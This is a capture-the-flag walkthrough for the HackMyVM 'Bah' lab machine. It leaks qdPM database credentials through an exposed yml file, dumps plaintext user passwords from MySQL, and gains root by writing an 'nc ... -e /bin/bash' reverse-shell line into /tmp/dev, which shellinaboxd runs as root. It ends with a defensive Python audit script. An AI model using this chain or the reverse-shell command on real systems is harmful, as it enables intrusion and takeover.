Daily archive: August 22, 2021

HackMyVm Bah Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Bah

Scan ports.

```bash
~ nmap -sV -sC -p- 192.168.56.100 -oN ports.log
...
PORT     STATE SERVICE VERSION
80/tcp   open  http    nginx 1.18.0
|_http-server-header: nginx/1.18.0
|_http-title: qdPM | Login
3306/tcp open  mysql   MySQL 5.5.5-10.5.11-MariaDB-1
...
```

Opening port 80 in a web browser shows a qdPM v9.2 login panel. A quick search shows that this version is known to leak its database credentials.

```text
# Exploit Title: qdPM 9.2 - DB Connection String and Password Exposure (Unauthenticated)
# Date: 03/08/2021
# Exploit Author: Leon Trappett (thepcn3rd)
# Vendor Homepage: https://qdpm.net/
# Software Link: https://sourceforge.net/projects/qdpm/files/latest/download
# Version: 9.2
# Tested on: Ubuntu 20.04 Apache2 Server running PHP 7.4

The password and connection string for the database are stored in a yml file. To access the yml file you can go to http://<website>/core/config/databases.yml file and download.
```

Download databases.yml to get the database username and password.

```bash
~ wget http://192.168.56.100/core/config/databases.yml
~ cat databases.yml
...
username: qpmadmin
password: "<?php echo urlencode('qpmpazzw') ; ?>"
```

Log in to MySQL on port 3306 with those credentials; the database contains a list of URLs.

```bash
# -P (uppercase) sets the port; the lowercase -p at the end prompts for the password
~ mysql -h 192.168.56.100 -P 3306 -u qpmadmin -p
...
+----+-------------------------+
| id | url                     |
+----+-------------------------+
|  1 | http://portal.bah.hmv   |
|  2 | http://imagine.bah.hmv  |
|  3 | http://ssh.bah.hmv      |
|  4 | http://dev.bah.hmv      |
|  5 | http://party.bah.hmv    |
|  6 | http://ass.bah.hmv      |
|  7 | http://here.bah.hmv     |
|  8 | http://hackme.bah.hmv   |
|  9 | http://telnet.bah.hmv   |
| 10 | http://console.bah.hmv  |
| 11 | http://tmux.bah.hmv     |
| 12 | http://dark.bah.hmv     |
| 13 | http://terminal.bah.hmv |
+----+-------------------------+
13 rows in set (0.001 sec)
```

It also contains a users table with plaintext passwords.

```sql
MariaDB [hidden]> select * from users;
+----+---------+---------------------+
| id | user    | password            |
+----+---------+---------------------+
|  1 | jwick   | Ihaveafuckingpencil |
|  2 | rocio   | Ihaveaflower        |
|  3 | luna    | Ihavealover         |
|  4 | ellie   | Ihaveapassword      |
|  5 | camila  | Ihaveacar           |
|  6 | mia     | IhaveNOTHING        |
|  7 | noa     | Ihaveflow           |
|  8 | nova    | Ihavevodka          |
|  9 | violeta | Ihaveroot           |
+----+---------+---------------------+
9 rows in set (0.001 sec)
```

Put the hostnames from the URL list into a wordlist and enumerate virtual hosts. Every host answers with 200, but party.bah.hmv returns the smallest response, so it is the one that serves different content.

```bash
~ gobuster vhost -u bah.hmv -w dic
===============================================================
2021/08/22 10:38:10 Starting gobuster in VHOST enumeration mode
===============================================================
Found: party.bah.hmv (Status: 200) [Size: 5216]
Found: imagine.bah.hmv (Status: 200) [Size: 5659]
Found: portal.bah.hmv (Status: 200) [Size: 5657]
Found: hackme.bah.hmv (Status: 200) [Size: 5657]
Found: telnet.bah.hmv (Status: 200) [Size: 5657]
Found: dev.bah.hmv (Status: 200) [Size: 5651]
Found: ssh.bah.hmv (Status: 200) [Size: 5651]
Found: here.bah.hmv (Status: 200) [Size: 5653]
Found: ass.bah.hmv (Status: 200) [Size: 5651]
Found: console.bah.hmv (Status: 200) [Size: 5659]
Found: tmux.bah.hmv (Status: 200) [Size: 5653]
Found: dark.bah.hmv (Status: 200) [Size: 5653]
Found: terminal.bah.hmv (Status: 200) [Size: 5661]
```

Add party.bah.hmv to /etc/hosts and visit port 80 again: this virtual host serves a browser-based shell login. Log in with the credentials from the yml file.

This web shell works well enough, so there is no need to spawn a reverse shell at this point.

In /home there is another user, rocio. Switch to rocio using the password for that user from the users table.

```bash
qpmadmin@bah:/home/rocio$ su rocio
Password:
rocio@bah:~$ id
uid=1000(rocio) gid=1000(rocio) groups=1000(rocio),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
```

Running pspy reveals an interesting shellinaboxd command line.

```text
2021/08/21 23:38:00 CMD: UID=107  PID=452    | /usr/bin/shellinaboxd -q --background=/var/run/shellinaboxd.pid -c /var/lib/shellinabox -p 4200 -u shellinabox -g shellinabox --user-css Black on White:+/etc/shellinabox/options-enabled/00+Black on White.css,White On Black:-/etc/shellinabox/options-enabled/00_White On Black.css;Color Terminal:+/etc/shellinabox/options-enabled/01+Color Terminal.css,Monochrome:-/etc/shellinabox/options-enabled/01_Monochrome.css --no-beep --disable-ssl --localhost-only -s/:LOGIN -s /devel:root:root:/:/tmp/dev
```

The shellinabox documentation on GitHub explains the -s (--service) syntax: /devel:root:root:/:/tmp/dev means that a request to http://<host>/devel runs /tmp/dev as user root and group root, with / as the working directory.

Since /tmp is writable by every user, we create our own script at /tmp/dev.

```bash
~ echo 'nc 192.168.56.150 1234 -e /bin/bash' >/tmp/dev
~ chmod +x /tmp/dev
```

Visiting http://party.bah.hmv/devel/ in the browser executes the script as root, and the listener receives a root shell.

```bash
~ nc -nlvp 1234
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.56.100.
Ncat: Connection from 192.168.56.100:59154.
id
uid=0(root) gid=0(root) groups=0(root)
```
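The root cause of this box is a shellinaboxd service that runs a root command from /tmp. As an added defensive check, not part of the original write-up, the following Python script parses the -s/--service arguments (the documented /path:LOGIN, /path:SSH[:host] and /path:user:group:cwd:cmdline forms) out of a pspy or ps line and flags services that run as root from a location any user can modify. The sample line is constructed from the pspy capture above (reduced to the relevant flags), and the list of world-writable directories is an assumption.

```python
"""Audit shellinaboxd -s/--service specs for root commands stored where any user can write."""
import os
import shlex
from collections import namedtuple

WORLD_WRITABLE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")  # assumed list, extend as needed
# app is "LOGIN", "SSH" or "CMD"; user/group/cwd/cmd are only set for "CMD"
Service = namedtuple("Service", "url_path app user group cwd cmd", defaults=("",) * 4)
# Constructed sample: the pspy line from the write-up, reduced to the relevant flags
SAMPLE = ("2021/08/21 23:38:00 CMD: UID=107  PID=452    | /usr/bin/shellinaboxd -q -p 4200 "
          "-u shellinabox -g shellinabox --localhost-only -s/:LOGIN -s /devel:root:root:/:/tmp/dev")

def parse_service(spec: str) -> Service:
    """/path:LOGIN, /path:SSH[:host] or /path:user:group:cwd:cmdline (the documented forms)."""
    path, _, rest = spec.partition(":")
    if rest == "LOGIN" or rest.startswith("SSH"):
        return Service(path, rest.split(":", 1)[0])
    parts = rest.split(":", 3)  # the command line itself may contain colons
    if len(parts) != 4:
        raise ValueError(f"malformed service spec: {spec}")
    return Service(path, "CMD", *parts)

def services_from_cmdline(cmdline: str) -> list:
    """Collect every -s VALUE, -sVALUE and --service=VALUE argument."""
    argv = shlex.split(cmdline)
    found = []
    for i, arg in enumerate(argv):
        if arg in ("-s", "--service") and i + 1 < len(argv):
            found.append(parse_service(argv[i + 1]))
        elif arg.startswith("-s") and len(arg) > 2:  # joined form, e.g. -s/:LOGIN
            found.append(parse_service(arg[2:]))
        elif arg.startswith("--service="):
            found.append(parse_service(arg.split("=", 1)[1]))
    return found

def is_risky(svc: Service) -> bool:
    """Root (name or uid 0) command whose program sits in a world-writable dir or is writable by others."""
    if svc.app != "CMD" or svc.user not in ("root", "0") or not svc.cmd:
        return False
    prog = shlex.split(svc.cmd)[0]
    in_shared_dir = prog.startswith(WORLD_WRITABLE_DIRS)
    return in_shared_dir or (os.path.isfile(prog) and os.stat(prog).st_mode & 0o002 != 0)

def audit_pspy_line(line: str) -> list:
    """URL paths of risky services in one pspy 'CMD:' line (prefix before '| ' is dropped)."""
    cmdline = line.split("| ", 1)[-1]
    return [s.url_path for s in services_from_cmdline(cmdline) if is_risky(s)]

if __name__ == "__main__":
    print(audit_pspy_line(SAMPLE))  # ['/devel']
```

The same check can be run against `ps -eo args` output on a host that runs shellinaboxd; anything it reports should be moved to a root-owned, non-writable path or dropped to an unprivileged user.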